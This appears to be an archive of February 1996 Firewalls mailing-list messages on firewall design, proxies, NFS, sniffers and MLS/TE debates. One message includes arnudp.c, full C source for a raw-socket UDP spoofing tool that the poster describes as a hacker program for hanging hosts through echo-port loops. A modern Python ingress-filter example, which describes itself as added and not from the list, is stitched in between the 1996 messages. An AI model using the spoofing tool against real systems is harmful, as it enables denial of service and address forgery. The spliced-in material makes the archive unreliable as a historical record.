From firewalls-owner Sun Feb 4 18:48:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA19005 for firewalls-outgoing; Sun, 4 Feb 1996 18:08:34 -0800 (PST) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id SAA19000 for ; Sun, 4 Feb 1996 18:08:28 -0800 (PST) Received: from beach.sctc.com by relay4.UU.NET with ESMTP id QQabmv09438; Sun, 4 Feb 1996 15:18:37 -0500 (EST) Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id OAA12021; Sun, 4 Feb 1996 14:15:21 -0600 (CST) Received: from sphinx.sctc.com (sphinx.sctc.com [172.17.192.3]) by beach.sctc.com (8.7.2/8.7.2) with ESMTP id OAA12017; Sun, 4 Feb 1996 14:15:20 -0600 (CST) Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by sphinx.sctc.com (8.7.1/8.6.10) with SMTP id OAA04528; Sun, 4 Feb 1996 14:15:53 -0600 (CST) Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id OAA27086; Sun, 4 Feb 1996 14:15:53 -0600 Date: Sun, 4 Feb 1996 14:15:53 -0600 From: Rick Smith Message-Id: <199602042015.OAA27086@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com, watt@sware.com Subject: Re: Mandatory protection (was: product selection) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Charles Watt writes: > Reread my message. It had nothing to do with >labeled IP. It simply used the security features provided by a >typical MAC-enforcing protocol stack to duplicate the features of >a system based on TE. No labels for network data required. I reread your message and I stand corrected. If I follow things correctly, the SecureWare approach omits labels at the appropriate point in the network stack so that subjects at different levels may share it. I assume that there's some mechanism to ensure the binding between ports and levels. 
I've read your posts in the past and found it peculiar that you'd suggest something so bizarre as to label Internet traffic. I should have realized it was a misunderstanding. > But TE provides no advantage >over a similar system based on MAC, such as the Harris firewall. I'm not about to restart a several week discussion that we've just concluded, but the statement "no advantage" is excessive. The relative merits of TE and MLS are tied to how one assesses the threat, which really depends on what the customer is protecting. Rick. smith@sctc.com secure computing corporation From firewalls-owner Mon Feb 5 02:21:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA04081 for firewalls-outgoing; Mon, 5 Feb 1996 01:52:59 -0800 (PST) Received: from bb.hks.net (bb.hks.net [199.183.60.11]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id BAA04067 for ; Mon, 5 Feb 1996 01:52:53 -0800 (PST) Received: from old-bb.hks.net (old-bb.hks.net [199.183.60.22]) by bb.hks.net (8.7/8.7-hks1) with SMTP id EAA06069 for ; Mon, 5 Feb 1996 04:49:11 -0500 Received: (from field@localhost) by old-bb.hks.net (8.6.9/8.6.9-bb2) id EAA11563 for firewalls@bb.hks.net; Mon, 5 Feb 1996 04:48:26 -0500 Received: from GATEWAY by bb.com with netnews for firewalls@bb.hks.net (firewalls@bb.hks.net) To: firewalls@bb.hks.net Date: 5 Feb 1996 04:49:06 -0500 From: bressen@hks.net (Andrew K. Bressen) Message-ID: <4f4jqi$5t7@bb.hks.net> Organization: HKS.net References: <256176126.339531179@va.arca.com> Subject: Re: Firewall API's Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <256176126.339531179@va.arca.com>, Jeff Williams wrote: >We're wondering whether or not it is common practice to provide an API so >that we can create our own proxy applications if we want to. At least one >vendor has said "No way". well, TIS Gauntlet (and FWTK) has a "plug-board" proxy that can be used to proxy a given TCP port (or maybe even port pair). 
you could also look into SOCKS. I'm not sure what the status of skronk and gssapi are, or if they could be applied to this problem. >Is it reasonable to expect such an API with a firewall product? What's the >best way to find out which ones do or do not? reasonable, sure. realistic, I dunno. many firewall vendors wish to give out as little info as possible about the innards of their systems, and users adding things to those systems is generally not supported. From firewalls-owner Mon Feb 5 02:38:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA05645 for firewalls-outgoing; Mon, 5 Feb 1996 02:28:15 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id CAA05629 for ; Mon, 5 Feb 1996 02:28:08 -0800 (PST) Message-Id: <199602051028.CAA05629@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA178906048; Mon, 5 Feb 1996 21:27:28 +1100 From: Darren Reed Subject: Re: NFS services and firewalls To: igood@mprgate.mpr.ca (Ian Good) Date: Mon, 5 Feb 1996 21:27:28 +1100 (EDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: <9602021826.AA23441@edzo.mpr.ca> from "Ian Good" at Feb 2, 96 10:26:39 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Ian Good, sie said: [...] > If there is a serious problem with this, would using NFS (v3) significantly > improve things? If coupled with NIS+ (DES credentials only), then it is more secure for allowing the remote box to mount and use your disks than using regular NFS/RPC. The public key part of NIS+ is fairly weak, by comparison with PGP and still open to the same timing attacks. However, you want to make sure you're using TCP for NFS (v3 provides this), although this limits your problems to TCP rather than UDP. 
Given the number of attacks available through both protocol's, it's a matter of choosing the one with the least security problems. NFS over TCP could be a win if the anti-hijacking code in FW-1 v2 works well. You may wish to consider using AFS (which can take advantage of Kerberos) or another network filesystem with stronger authentication than NFS. Ideally, however, you'd use SunScreen (or something similar) between your site and the other for all the NFS traffic, even if you're running over a private line, to make sure all your data (which I presume is confidential if you're putting the server behind the firewall) is encrypted when crossing cables/networks not owned by yourself. darren From firewalls-owner Mon Feb 5 06:08:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA11371 for firewalls-outgoing; Mon, 5 Feb 1996 05:54:35 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA11366 for ; Mon, 5 Feb 1996 05:54:31 -0800 (PST) Message-Id: <199602051354.FAA11366@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA205128423; Tue, 6 Feb 1996 00:53:43 +1100 From: Darren Reed Subject: Mazama Packet Filter: Misleading advertising To: Firewalls@GreatCircle.COM (Firewalls Mailing List) Date: Tue, 6 Feb 1996 00:53:43 +1100 (EDT) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The following appears on one of their web pages: (http://www.mazama.com/mpf12desc.html): ... TECHNICAL SECURITY FEATURE LIST _________________________________________________________________ * Blocking of all services which are not explicitly enabled. * Blocking of ICMP Redirect Packets. * Blocking of IP Source Route options. * Blocking of Spoofed IP addresses. * Blocking of Spoofed IP fragments. 
* Dangerous services such as rsh/rlogin, X window, Openwindows, NFS, and other RPC services are blocked by default. * TCP Services use SYN/ACK checking to verify the direction of all TCP connections. * We have used SATAN to analyze MPF installations and verified that the above security problems are solved by MPF. The current version of MPF can detect port scans from SATAN and automatically block all packets from a host running SATAN. ... The last item is what I would draw your attention to. SATAN does *NOT* test all of the above. In fact, it only does the first. Well, to be pedantic, it doesn't look for blocked services, but scans looking for services which are active and are possible avenues for a breakin. That is unless they developed their own plug-in tests for SATAN, which their web page doesn't brag about, so I'll assume to not be the case O:). Maybe they assumed that their DHB (Dynamic Host Blocking) solved everything when it blocks out an entire host when it notices a SATAN style attack. Now, if they had of mentioned ISS, I might take it more seriously and assume that maybe 3 or more of the above had been checked... IMHO, that particular page stinks...(you can find other rich comments there, too...)...probably from Marcus's dead chicken that they waved around and dropped there ;) darren (p.s. 
chris, if you get an order from a certain company, you owe me one ;-) From firewalls-owner Mon Feb 5 06:38:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA12209 for firewalls-outgoing; Mon, 5 Feb 1996 06:29:51 -0800 (PST) Received: from melita.melita.com (melita.melita.com [192.68.22.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA12195 for ; Mon, 5 Feb 1996 06:29:46 -0800 (PST) Received: from melupl.melita.com (melupl.melita.com [10.168.27.12]) by melita.melita.com (8.6.12/8.6.9) with SMTP id JAA12044 for ; Mon, 5 Feb 1996 09:28:17 -0500 Received: by melupl.melita.com (AIX 3.2/UCB 5.64/4.03) id AA62595; Mon, 5 Feb 1996 09:28:51 -0500 From: davek@melupl.melita.com (Dave Kennedy) Message-Id: <9602051428.AA62595@melupl.melita.com> Subject: I-Phone - safe? What ports? To: firewalls@greatcircle.com Date: Mon, 5 Feb 1996 09:28:51 -0500 (EST) Reply-To: davek@melita.com (Dave Kennedy) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm being asked to investigate proxying I-Phone (Internet Phone) traffic. This product allows voice conversations to happen over the Net. How safe or unsafe this is? Is it TCP or UDP? What ports does it use? Will plug-gw work? Thanks. 
--
| Dave Kennedy (davek@melita.com)   Voice: 770-409-4575 |

From firewalls-owner Mon Feb 5 07:24:08 1996
From: Chris Eastman
Date: Mon, 5 Feb 1996 10:02:44 -0500
To: Tony Ferro
Cc: firewalls@GreatCircle.COM
Subject: Re: PC based sniffer

tcpdump has options for sniffing ppp and/or slip streams.

--chris
Christopher Eastman, MDS Network Engineer, chris@cwi.net
Cable & Wireless, Inc, 1919 Gallows Road, Vienna, VA 22182

From firewalls-owner Mon Feb 5 07:38:29 1996
From: "Kare Presttun"
Organization: Alcanet International
Date: Mon, 5 Feb 1996 16:06:45 +0100
To: Firewalls@GreatCircle.COM
Subject: SESAME

Hi, all,

The source code for SESAME distributed systems security is now available as of today via:

http://www.esat.kuleuven.ac.be/cosic/sesame.html

Good luck.

Kare
----------------------------------------------------------
| Kare Presttun                  Alcanet International     |
| Tel: +33 1 4058 5614           33, rue Emeriau          |
| Fax: +33 1 4058 5945           F-75015 Paris            |
| Kare.Presttun@ansf.alcatel.fr  FRANCE                   |
----------------------------------------------------------

From firewalls-owner Mon Feb 5 08:12:37 1996
From: Frederick M Avolio
Date: Mon, 05 Feb 1996 10:13:06 -0500
To: bressen@hks.net (Andrew K. Bressen), firewalls@bb.hks.net
Subject: Re: Firewall API's

This is a good idea, and one that I will stick into our product requirements list. A benefit to providing source code is that customers can create proxies based on, or by looking at, other proxies. Customers of ours have done this. But an API is a good idea.

Fred

At 04:49 AM 2/5/96 -0500, Andrew K. Bressen wrote:
>In article <256176126.339531179@va.arca.com>,
>Jeff Williams wrote:
>>We're wondering whether or not it is common practice to provide an API so
>>that we can create our own proxy applications if we want to. At least one
>>vendor has said "No way".
>
>well, TIS Gauntlet (and FWTK) has a "plug-board" proxy that can be used
>to proxy a given TCP port (or maybe even port pair).
>
>you could also look into SOCKS.
>
>I'm not sure what the status of skronk and gssapi are, or if they
>could be applied to this problem.
>
>>Is it reasonable to expect such an API with a firewall product? What's the
>>best way to find out which ones do or do not?
>
>reasonable, sure. realistic, I dunno.
>many firewall vendors wish to give out as little info as possible
>about the innards of their systems, and users adding things to
>those systems is generally not supported.
>
>

From firewalls-owner Mon Feb 5 08:16:31 1996
From: gblolmxb@ibmmail.com
Date: Mon, 05 Feb 1996 10:45:01 EST
To: firewalls@greatcircle.com
Subject: WWW Proxy

I know about telnet & ftp proxies that will allow internal users to log on to a firewall and access the internet, thus allowing us to continue using static routing only on our routers (we would only need to add one more, for the firewall's 'inside' address). Does such a proxy exist for WWW so that:

1. Users can use whichever browsers they like.
2. The 'standard' winsock.dll, such as provided by FTP with their Onnet product, can still be used.

If so, which commercial firewalls support this?
Mark
gblolmxb@ibmmail.com

From firewalls-owner Mon Feb 5 08:48:06 1996
From: Chris Kostick
Date: Mon, 5 Feb 1996 11:29:21 -0500
To: Tony Ferro
Cc: "firewalls@GreatCircle.COM"
Subject: RE: PC based sniffer

I use version 3.0.2 to examine my PPP link. I happen to run it under Linux.

-- chris

> tcpdump has options for sniffing ppp and/or slip streams.
From firewalls-owner Mon Feb 5 09:24:39 1996
From: William Bradley Paris (Volt Comp)
Date: Mon, 5 Feb 96 09:00:51 TZ
To: firewalls@GreatCircle.COM, firewalls-owner@greatcircle.com
Subject: Re: PC based sniffer

Microsoft has an NDIS-based sniffer that works on WFW, W'95 and NT by the name of Network Monitor. It does not exist as a separate product, but is available through premier support or bundled with SMS server. It can sniff and parse your PPP and SLIP connections under W'95 & NT.

Thx - brad

The information and opinions in this message, real or imaginary, are my own and do not reflect those of my employer, Microsoft or other rational entities.

----------
| From: Tony Ferro
| To:
| Subject: Re: PC based sniffer
| Date: Sunday, February 04, 1996 4:20PM
|
| Hi Folks,
|
| I've seen responses for ethernet sniffers, is there any software available
| for sniffing your SLIP/PPP dial connection? I'm using ShivaPPP ndis dialer
| and its trace features are pretty limited - can count IP pkts, but can't
| see inside them.
|
| TIA,
| Tony
|

From firewalls-owner Mon Feb 5 09:42:58 1996
From: Chris Eastman
Date: Mon, 5 Feb 1996 12:34:52 -0500
To: firewalls@greatcircle.com
Subject: slip/ppp sniffing

Supposedly lanl has finished up watcher, I was told it has plenty of options for monitoring ppp/slip connections. Has watcher gone commercial, or is there a PD version out there somewhere?
--chris
Christopher Eastman, MDS Network Engineer, chris@cwi.net
Cable & Wireless, Inc, 1919 Gallows Road, Vienna, VA 22182

From firewalls-owner Mon Feb 5 09:53:50 1996
From: Sick Puppy
Date: Mon, 5 Feb 1996 12:40:05 -0500 (EST)
To: firewalls@GreatCircle.com
Subject: Need a few pointers

My hind brain keeps telling my forebrain that somewhere it read that Windows 95 and Windows NT have been banned on some networks because of the problems they created when connecting to other operating systems. Could some kind soul e-mail me pointers to articles or postings on this subject, please?
Sick Puppy, tCDE
cDm

From firewalls-owner Mon Feb 5 10:24:10 1996
From: Jose Roberto Menezes Monteiro
Date: Mon, 5 Feb 1996 15:25:29 -0200
To: Firewalls@GreatCircle.COM
Subject: IP kernel variable of Solaris

Does anybody know a reference on the net where I could find information about all the IP kernel variables of Solaris?
TIA,

From firewalls-owner Mon Feb 5 10:49:23 1996
From: Brian Murrell
Date: Mon, 5 Feb 1996 09:29:19 -0800 (PST)
To: chris@cwi.net
Cc: tferro@raptor.com, firewalls@GreatCircle.COM
Subject: Re[2]: PC based sniffer

Chris Eastman wrote:
> tcpdump has options for sniffing ppp and/or slip streams.
>

Yeah right. The support is pretty crude. I've been extending the support for PPP as I find time. The real hard part is how do you actually get the data stream to use tcpdump on??

b.

--
Brian J. Murrell                 murrell@bctel.net
BCTel Advanced Communications    brian@ilinx.com
Vancouver, B.C.
brian@wimsey.com                 604 454 5261

From firewalls-owner Mon Feb 5 10:49:56 1996
From: sandy bryant
Date: Mon, 5 Feb 1996 13:28:41 -0500
To: Sick Puppy, firewalls@GreatCircle.COM
Subject: Re: Need a few pointers

At 12:40 PM 2/5/96 -0500, Sick Puppy wrote:
>My hind brain keeps telling my forebrain that somewhere it read that
>Windows 95 and Windows NT has been banned on some networks because of the
>problems they created when connecting to other operating systems. Could
>some kind soul e-mail me pointers to articles or postings on this subject,
>please?
>
> Sick Puppy, tCDE
> cDm
>

Maybe you're thinking of the problem Novell networks had with Windows 95? Since Windows 95 answers the Netware client GetNearestServer call with a packet claiming to be a Netware server, it can seriously confuse Netware clients if there is no other server on the LAN - the client will time out trying to log into the 95 machine (after all, it said it was a server...) and then fail. Even if there is a true server on the network, some clients will still get the 95 packet first.

Don't know if this has been fixed yet.

sandy bryant
kesmai corp.
sandy@kesmai.com

From firewalls-owner Mon Feb 5 10:50:14 1996
From: Chris Woods
Date: Mon, 5 Feb 1996 13:16:02 -0500 (EST)
To: gblolmxb@ibmmail.com
Cc: firewalls@GreatCircle.COM
Subject: Re: WWW Proxy

On Mon, 5 Feb 1996 gblolmxb@ibmmail.com wrote:

> to add one more, for the firewall's 'inside' address). Does such a proxy
> exist for WWW so that:
>
> 1. Users can use whichever browsers they like.
> 2. The 'standard' winsock.dll, such as provided by FTP with their
> Onnet product, can still be used.

In many situations when an http proxy is required, I install CERN's httpd and run it in caching-proxy mode. I set it up to listen to a port, and simply point all http, ftp, and gopher requests at that port. Note that the clients in question must support the ability to specify a proxy host for these connections. In most cases, our clients are using Netscape for all outgoing Internet usage, including mail, http, ftp, and gopher (how often do we really see gopher servers these days?).

> If so, which commercial firewalls support this?

I have this in place with TIS' fwtk. I simply don't use the http-gw that came with the fwtk, and use CERN's instead.

Chris Woods
Systems Administrator            cjwoods@paladin.com
Paladin Computing Solutions      617-273-4226
http://www.paladin.com/chris/

Want the government to control what you are allowed to read and see? "Why, NO!", you say? See http://www.eff.org/blueribbon.html

From firewalls-owner Mon Feb 5 11:23:38 1996
From: Juan Carlos Machado
Date: Mon, 5 Feb 1996 14:06:41 -0300 (WDT)
To: firewalls@greatcircle.com
Subject: CISCO Access Server Configuration

Hello,

We have a CISCO Access Server 2511 that provides Home Access to the Internet. I find that only the PPP connections are registered in the TACACS wtmp file. We want to do the same with the simple TELNET connections. Does anybody know how?

Thanks a lot for your help.

PS: excuse my poor English.

_________________________________________________________
Juan Carlos Machado Z.      jmachado@ciat.cgiar.org
Network Support             j.machado@cgnet.com
Voice Ph#: (57-2)4450-691
CIAT (International Center for Tropical Agriculture)
Cali - Valle - Colombia.
Phone: 4450000
JK:= NOT(reflect(opinions' self,opinions' employer));

From firewalls-owner Mon Feb 5 11:25:23 1996
From: "Richard Giering Jr."
Date: 5 Feb 96 12:39:39
To: firewalls
Subject: RPC Across a firewall?

I know the kind of reaction I'm liable to get but I said I'd check into it....

We have developers who are writing apps based upon RPC and demanding that RPC be opened on the firewall. The idea is to enable users with their own Internet provider to be able to access Internal applications using RPC/client-server apps.

I have some concerns listed below. Can anyone think of any more?

1) RPC runs on UDP (right?) and UDP opens a whole other bag of worms
2) RPC and portmapper are hard if not impossible to proxy.
3) RPC is insecure
4) portmapper has many known security holes.

My reaction has been "if they want to dialup, we'll setup internal modems". Is anyone aware of firewall products that allow and protect RPC?

Rick Giering, Firewall Ranger
CCH Inc.
From firewalls-owner Mon Feb 5 11:26:52 1996
From: Andrew Cameron
Date: Mon, 5 Feb 1996 20:52:09 +0200 (GMT+0200)
To: Firewalls@GreatCircle.COM
Subject: Re: Echo Vulnerability

I noticed someone mentioning the echo port. My advice is to disable the echo service completely. It is often used by hackers to hang a computer. Try sending a packet from port 7 your ip to port 7 your ip. The system will bounce the packet back and forth slowing the system drastically.

A Hacker Program I have seen used to do this is called arnudp.c

---------------------------Cut Here---------------------------------------
/************************************************************************/
/* arnudp.c version 0.01 by Arny - cs6171@scitsc.wlv.ac.uk              */
/* Sends a single udp datagram with the source/destination address/port */
/* set to whatever you want. Unfortunately Linux 1.2 and SunOS 4.1      */
/* don't seem to have the IP_HDRINCL option, so the source address will */
/* be set to the real address. It does however work ok on SunOS 5.4.    */
/* Should compile fine with just an ANSI compiler (such as gcc) under   */
/* Linux and SunOS 4.1, but with SunOS 5.4 you have to specify extra    */
/* libraries on the command line:                                       */
/* /usr/ucb/cc -o arnudp arnudp001.c -lsocket -lnsl                     */
/* I'll state the obvious - this needs to be run as root! Do not use    */
/* this program unless you know what you are doing, as it is possible   */
/* that you could confuse parts of your network / internet.             */
/* (c) 1995 Arny - I accept no responsibility for anything this does.   */
/************************************************************************/
/* I used the source of traceroute as an example while writing this.    */
/* Many thanks to Dan Egnor (egnor@ugcs.caltech.edu) and Rich Stevens   */
/* for pointing me in the right direction.                              */
/************************************************************************/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

struct sockaddr sa;

main(int argc,char **argv)
{
  int fd;
  int x=1;
  struct sockaddr_in *p;
  struct hostent *he;
  /* 20-byte IP header, 8-byte UDP header, 10-byte payload */
  u_char gram[38]=
  {
    0x45, 0x00, 0x00, 0x26,
    0x12, 0x34, 0x00, 0x00,
    0xFF, 0x11, 0, 0,
    0, 0, 0, 0,
    0, 0, 0, 0,
    0, 0, 0, 0,
    0x00, 0x12, 0x00, 0x00,
    '1','2','3','4','5','6','7','8','9','0'
  };

  if(argc!=5)
  {
    fprintf(stderr,"usage: %s sourcename sourceport destinationname destinationport\n",*argv);
    exit(1);
  };

  if((he=gethostbyname(argv[1]))==NULL)
  {
    fprintf(stderr,"can't resolve source hostname\n");
    exit(1);
  };
  bcopy(*(he->h_addr_list),(gram+12),4);

  if((he=gethostbyname(argv[3]))==NULL)
  {
    fprintf(stderr,"can't resolve destination hostname\n");
    exit(1);
  };
  bcopy(*(he->h_addr_list),(gram+16),4);

  *(u_short*)(gram+20)=htons((u_short)atoi(argv[2]));
  *(u_short*)(gram+22)=htons((u_short)atoi(argv[4]));

  p=(struct sockaddr_in*)&sa;
  p->sin_family=AF_INET;
  bcopy(*(he->h_addr_list),&(p->sin_addr),sizeof(struct in_addr));

  if((fd=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))== -1)
  {
    perror("socket");
    exit(1);
  };

#ifdef IP_HDRINCL
  fprintf(stderr,"we have IP_HDRINCL :-)\n\n");
  if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0)
  {
    perror("setsockopt IP_HDRINCL");
    exit(1);
  };
#else
  fprintf(stderr,"we don't have IP_HDRINCL :-(\n\n");
#endif

  if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))== -1)
  {
    perror("sendto");
    exit(1);
  };

  printf("datagram sent without error:");
  for(x=0;x<(sizeof(gram)/sizeof(u_char));x++)
  {
    if(!(x%4)) putchar('\n');
    printf("%02x",gram[x]);
  };
  putchar('\n');
}
----------------------------------------------------------------------------

From firewalls-owner Mon Feb 5 11:38:57 1996
From: "william.wells"
Date: Mon, 05 Feb 96 13:26:00 CST
To: FIREWALLS
Subject: Re: SSL and S-HTTP Proxy Status (as of 11 January 1996)

(Sorry for not crediting the original authors below - the multiple nested mail replies got confused by the time they got to me)

-- Writer 1 said:

So, I sympathize with the sentiment that TIS should either put some effort into maintaining fwtk, or release it so that a net-fwtk could be maintained by the user community.

Wait a minute -- are you asking TIS to keep spending money to keep giving you free firewalls?

-- Writer 2 said:

No I don't think that is what he is asking. I think that David was saying that if TIS isn't planning on doing anything further with the toolkit then why don't they release the code into the public domain or copy-left and let the community support it - after all it was (at least partly) developed under a DARPA contract at TAX PAYERS expense and should therefore belong to the TAX PAYERS and not TIS.

-- I say:

I'm not associated with TIS but I'd assume that the versions of fwtk that fall under the DARPA contract are relatively old and you probably don't need them. I'd assume that any version or update made after the contract is under their control. Personally, I don't find many companies giving away updated source, especially when they have a 'for sale' product.

William Wells
Manager, Technical Support
Damark International, Inc
william.wells@damark.com

From firewalls-owner Mon Feb 5 12:00:41 1996
From: Peter Morrissey
Organization: Syracuse University
Date: Mon, 05 Feb 1996 14:45:51 -0800
To: Firewalls@GreatCircle.COM
Subject: Novell inside IP Port?

Are there known TCP/UDP port(s) that support the tunneling of Novell inside IP? Someone recently set up such a tunnel and exposed all our Novell Servers to the Internet. I would like to prevent this from happening in the future.
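Returning to Andrew Cameron's echo-port message above: the loop he describes (a datagram whose source and destination are both port 7 on the same host, sent with a forged source address) is something a border packet filter can refuse before the host ever sees it, independently of whether the echo service is also disabled. The following is an added example, not code from the list or from any product mentioned on it. It parses a raw IPv4/UDP datagram the way a filter would and returns the reason for a drop; the internal prefix 192.0.2.0/24, the interface flag and the sample datagrams are all constructed for the demonstration.

```python
"""Added example: ingress checks against the UDP echo-port loop.

Three conditions are checked on a datagram arriving from the outside:
  1. source address equals destination address (the port-7-to-port-7 loop),
  2. source address is one of ours but the packet came in on the outside
     link (address spoofing, the thing IP_HDRINCL makes possible),
  3. either UDP port is 7 (echo), which has no business crossing the border.
"""
import ipaddress
import struct

ECHO_PORT = 7
# Assumption for the example: this prefix is "inside" the firewall, so it can
# never legitimately be the *source* of a packet arriving on the outside link.
INTERNAL_NET = ipaddress.ip_network("192.0.2.0/24")


def parse_ipv4_udp(datagram: bytes):
    """Return (src_ip, dst_ip, src_port, dst_port) for an IPv4 datagram
    carrying UDP, or raise ValueError if it is not one."""
    if len(datagram) < 20:
        raise ValueError("truncated IPv4 header")
    (version_ihl, _tos, _total_len, _ident, _flags_frag, _ttl, proto,
     _csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", datagram[:20])
    if version_ihl >> 4 != 4:
        raise ValueError("not IPv4")
    ihl = (version_ihl & 0x0F) * 4          # header length in bytes
    if proto != 17:
        raise ValueError("not UDP")
    if len(datagram) < ihl + 8:
        raise ValueError("truncated UDP header")
    src_port, dst_port = struct.unpack("!HH", datagram[ihl:ihl + 4])
    return (ipaddress.ip_address(src), ipaddress.ip_address(dst),
            src_port, dst_port)


def ingress_verdict(datagram: bytes, arrived_on_outside: bool):
    """Decide whether to drop a datagram. Returns a reason string for a
    drop, or None to accept. Non-IPv4/UDP traffic is outside this check."""
    try:
        src, dst, sport, dport = parse_ipv4_udp(datagram)
    except ValueError:
        return None
    if src == dst:
        return "source equals destination (echo loop)"
    if arrived_on_outside and src in INTERNAL_NET:
        return "spoofed internal source on outside interface"
    if dport == ECHO_PORT or sport == ECHO_PORT:
        return "echo service traffic blocked at border"
    return None


def build_udp(src: str, dst: str, sport: int, dport: int,
              payload: bytes = b"") -> bytes:
    """Construct an IPv4/UDP datagram for the test set (checksums left zero;
    the parser above does not verify them)."""
    udp_len = 8 + len(payload)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + udp_len, 0x1234, 0,
                     255, 17, 0,
                     ipaddress.ip_address(src).packed,
                     ipaddress.ip_address(dst).packed)
    udp = struct.pack("!HHHH", sport, dport, udp_len, 0)
    return ip + udp + payload


# Constructed sample traffic, as a filter on the outside interface would see it.
SAMPLES = {
    "loop":   build_udp("192.0.2.10", "192.0.2.10", 7, 7, b"1234567890"),
    "spoof":  build_udp("192.0.2.10", "192.0.2.20", 53, 53),
    "echo":   build_udp("198.51.100.5", "192.0.2.20", 40000, 7),
    "normal": build_udp("198.51.100.5", "192.0.2.20", 40000, 53),
}


def run_samples():
    """Apply the ingress check to every sample; returns {name: verdict}."""
    return {name: ingress_verdict(pkt, arrived_on_outside=True)
            for name, pkt in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name:7s} -> {verdict or 'accept'}")
```

The order of the checks matters only for the reported reason: the "loop" sample would also trip the spoofing rule, so the most specific condition is tested first. The "normal" sample passes, which is the point of a border rule like this: it removes one well-known way of hanging a host without touching ordinary traffic.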
From firewalls-owner Mon Feb 5 13:15:53 1996
From: "KM"
Date: Mon, 5 Feb 96 15:35:46 -0500
To: firewalls@GreatCircle.COM
Subject: Re: Mandatory protection (was: product selection)

In message <9602021404.AA18008@mordred.sware.com> Charles Watt writes:
> Fine. You've got a nice system. Its use of TE-based MAC gives it some
> definite competitive advantages over those systems that do not use MAC,
> if integrated and administered properly. But TE provides no advantage
> over a similar system based on MAC, such as the Harris firewall. There
> you must compete based upon other features, such as better application
> support or ease of administration.

Or portability.

Karen Goertzel
Manager, International Programmes and Special Projects
Secure Systems and Services Operation
Wang Federal, Inc.
7900 Westpark Drive - MS 700
McLean, Virginia 22102-4299
TEL: 703-827 3914   FAX: 703-827 3161
goertzek@wangfed.com   http://www.wangfed.com
+------------------------------+
| It infuriates me to be wrong |
| when I know I'm right.       |
|                 -- Moliere   |
+------------------------------+

From firewalls-owner Mon Feb 5 13:23:40 1996
From: "KM"
Date: Mon, 5 Feb 96 15:31:09 -0500
To: firewalls@GreatCircle.COM
Subject: Re: What are MLS and TE?

More accurately (unless you're interested in the Sterling Software homepage), the URL for TSIG is:

http://ftp.sterling.com/tsig/tsig.html

In message <199602012215.QAA01008@sparc14.cs.uiuc.edu> writes:
>
> I also recommend looking at the TSIG pages at http://www.sterling.com

Karen Goertzel
Wang Federal, Inc.
goertzek@wangfed.com   http://www.wangfed.com

From firewalls-owner Mon Feb 5 13:38:36 1996
From: "KM"
Date: Mon, 5 Feb 96 15:27:57 -0500
To: firewalls@GreatCircle.COM
Subject: Re: What are MLS and TE?

Given the original requestor is in Brazil, I would suggest taking a slightly less parochial view of the important Criteria and Guidances pertaining to MLS computing. It is quite likely that a Brazilian firm would be more interested in the Information Technology Security Evaluation Criteria (ITSEC) than in the TCSEC. Therefore, I also refer Ms. Ferreira Cunha to the following URL, which is the complete text of the ITSEC criteria:

http://first.org/secpubs/itsec.txt

Also at:

http://www.raptor.com/library/itsec.txt

You can also find the TCSEC (and related Rainbow books) online if you access a number of URLs. Between them, Raptor and SAIC have a number of the books covered, though by no means all.

http://www.raptor.com/library/std001.txt
http://www.raptor.com/library/std002.txt
http://www.raptor.com/library/std003.txt
http://www.raptor.com/library/std004.txt

Also look at:

http://mls.saic.com/papers/orange.txt
http://mls.saic.com/papers/trusted_config.txt
http://mls.saic.com/papers/trusted_dac.txt
http://mls.saic.com/papers/trusted_manag.txt
http://mls.saic.com/papers/trusted_dist.txt
http://mls.saic.com/papers/trusted_audit.txt

and

http://www.cs.cmu.edu/afs/cs.cmu.edu/user/bsy/security/CSC-STD-001-83.txt

For a good overview of MLS, please check out the Defense Information Systems Agency's URL on "MLS: The Basics":

http://www.disa.mil/MLS/info/basics/sec0.html

Karen Goertzel
Wang Federal, Inc.
goertzek@wangfed.com   http://www.wangfed.com

From firewalls-owner Mon Feb 5 13:54:02 1996
From: Tom Cooper
Date: Mon, 5 Feb 1996 16:32:39 -0500 (EST)
To: firewalls@greatcircle.com
Subject: SQL*Net proxy?

Has anyone successfully configured a proxy for outbound/inbound SQL*Net transactions?

